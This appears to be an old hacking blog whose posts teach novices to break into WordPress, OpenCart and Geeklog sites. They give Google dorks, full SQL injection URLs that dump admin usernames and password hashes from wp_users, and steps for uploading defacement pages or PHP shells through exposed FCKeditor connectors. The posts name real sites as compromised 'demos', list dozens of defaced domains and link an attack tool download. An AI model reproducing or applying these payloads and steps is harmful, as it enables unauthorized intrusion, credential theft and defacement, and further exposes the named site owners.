Search This Blog
Showing posts with label WordPress Hacking. Show all posts
Showing posts with label WordPress Hacking. Show all posts

Saturday, July 7, 2012

Wordpress fckeditor upload Vulnerability - Upload Your Deface Remotely


Wordpress fckeditor upload Vulnerability Upload Your Deface Remotely

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here

1- open Google.com and enter Dork:



inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
http://www.schoolshopper.com.au/
Then i'll will simply add the vuln URL after the website

Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)


and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

comment here if you have any problem in this tut

some demo for Practice (maybe some websites patched its my old collection so... )

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 7/07/2012 01:18:00 PM 1 comments
Labels:

Saturday, June 2, 2012

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.

[Image: untitled22.JPG]
The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=
Now replace the ?fbconnect_action=myhome&userid= with 
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 
Now The URL will be Like this ..
www.site.com/?fbconnect_action=myhome&userid=
with this
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.

[Image: untitled23.JPG]
he password is encrypted with Wordpress md5 (blowfish). You need to decode this.Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
or
www.victrimsite.com/wp-login.php

[Image: untitled26.JPG]
Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website :)

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 01:02:00 PM 0 comments
Labels: ,

Easy way of hacking Wordpress website


Easy way of hacking Wordpress website

Hi here i tell you how to hack wordpress site with easy way i will use exploit to hacksites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?

http://timani.net/wp-content/uploads/2010/04/wordpress-logo-300x282.png

First we search with this in google to find sites

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

see the Result :-



[Image: asdmr.png]

and i'm gonna test 1 of them for ex this find in google


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2


we are going to add the exploit : this is the exploit


/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


and the site look like this


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


http://img638.imageshack.us/img638/2927/asddy.png



now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 12:58:00 PM 0 comments
Labels: ,

Geeklog Remote Deface Upload Vunerablity

Geeklog Remote Deface Upload  Vunerablity, This Vunerablity is Similar to wordpress fckeditor upload Vunerablity (read about wordpress fckeditor uploadVunerablity ) in Geeklog just the Path Changed,


Lets Start 
open google.com & enter This dork 
inurl:"/geeklog/" 
or 
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html


Now go to site site.com/geeklog/
 Now Put The Url /Geeklog/fckeditor/editor/filemanager/upload/test.html after .com .net or site domain
now the url will be 
site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

Now select php in 
Select the "File Uploader" to use:


Now Upload Your deface :) 

Live Demo
http://www.sightline4bd.com/geeklog/
http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html
http://sightline4bd.com/geeklog/images/libraryHack.htm

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 12:50:00 PM 0 comments
Labels: ,

Mr.Dark Soul's Wordpress Blog Hacker

Its a Wordpress hacking software named  Mr.Dark Soul Wordpress Blog Hacker.its a Special Soft For Newbie who wanna hack WP blog .Scrreenshot is enough for teaching that how to use Mr.Dark Soul Wordpress Blog Hacker


Click On Images For Larger Size or its Image Links 
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

[Image: BCXFD.gif]

[Image: ywccU.gif]

[Image: dhn43.gif]

[Image: yJxc2.gif]


Download Linkhttp://www.2shared.com/file/0hiKLwdP/MrDark_Soul_Wordpress_Blog_Hac.html

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 12:22:00 PM 0 comments
Labels: ,

wordpress fckeditor upload Vunerablity : Upload Your Deface Remotly



wordpress-bug-300x276.png (300×276)
This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here 

1- open Google.com and enter Dork:



  • inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    • nurl:Powered By OpenCart
    You'll Got a lot of websites by google, select anyone ... For Example i got this one 
    • http://www.schoolshopper.com.au/
    Then i'll will simply add the vuln URL after the website 

    Example
    • http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

    (The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now a Page will be open Like This 



    Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)













    and Now see file upload option and upload your deface or shell
    and for checking shell or deface check this url 
    • www.site.com/deface.html
    • or
    • www.site.com/shell.php
    I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

    comment here if you have any problem in this tut 
    Victoire
    some demo for Practice (maybe some websites patched its my old collection so... )



    • http://ruthsgarden.com/jaihind.html
    • http://www.utahflowers.net/jaihind.html
    • http://www.eesnet.org/jaihind.html
    • http://bestonlinediscounts.net/
    • http://wenrestaurant.com/
    • http://ruthsgarden.com/
    • http://www.utahflowers.net/
    • http://www.inlove.my/
    • http://megamall.com.pk/
    • http://stefanyboutique.com/
    • http://www.virtualgeorge.info/
    • http://iphoneclone.biz/
    • http://amourcristallis.com/
    • http://www.eesnet.org/
    • http://www.schoolshopper.com.au/
    • http://www.mymaxi.nl/
    • http://wiretek.net/
    • http://shop.tjokgus.com/
    • http://www.aquariumsystem.it/
    • http://uae-shopper.com/
    • http://organicjewelries.com/
    • http://www.granmasantiques.com/
    • http://avocadogenie.com/
    • http://www.inputandanalysis.com
    • http://eddiegifts.com/
    • http://bestonlinediscounts.net/
    • http://wenrestaurant.com/
    • http://ruthsgarden.com/
    • http://www.utahflowers.net?/
    • http://www.inlove.my/
    • http://megamall.com.pk/
    • http://stefanyboutique.com?/
    • http://www.inputandanalysis.com/
    • http://www.virtualgeorge.info/
    • http://iphoneclone.biz/
    • http://amourcristallis.com?/
    • http://www.eesnet.org/
    • http://www.schoolshopper.com.au/
    • http://www.mymaxi.nl/
    • http://wiretek.net/
    • http://shop.tjokgus.com/
    • http://www.aquariumsystem.it/
    • http://uae-shopper.com/
    • http://organicjewelries.com/
    • http://www.granmasantiques.com/
    • http://avocadogenie.com/
    • http://www.inputandanalysis.com/
    • http://www.utahflowers.net/
    • http://stefanyboutique.com/
    • http://amourcristallis.com/

    Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
    Posted by Vishal S Sangwa at 6/02/2012 11:51:00 AM 0 comments
    Labels: ,
    Subscribe to: Comments (Atom)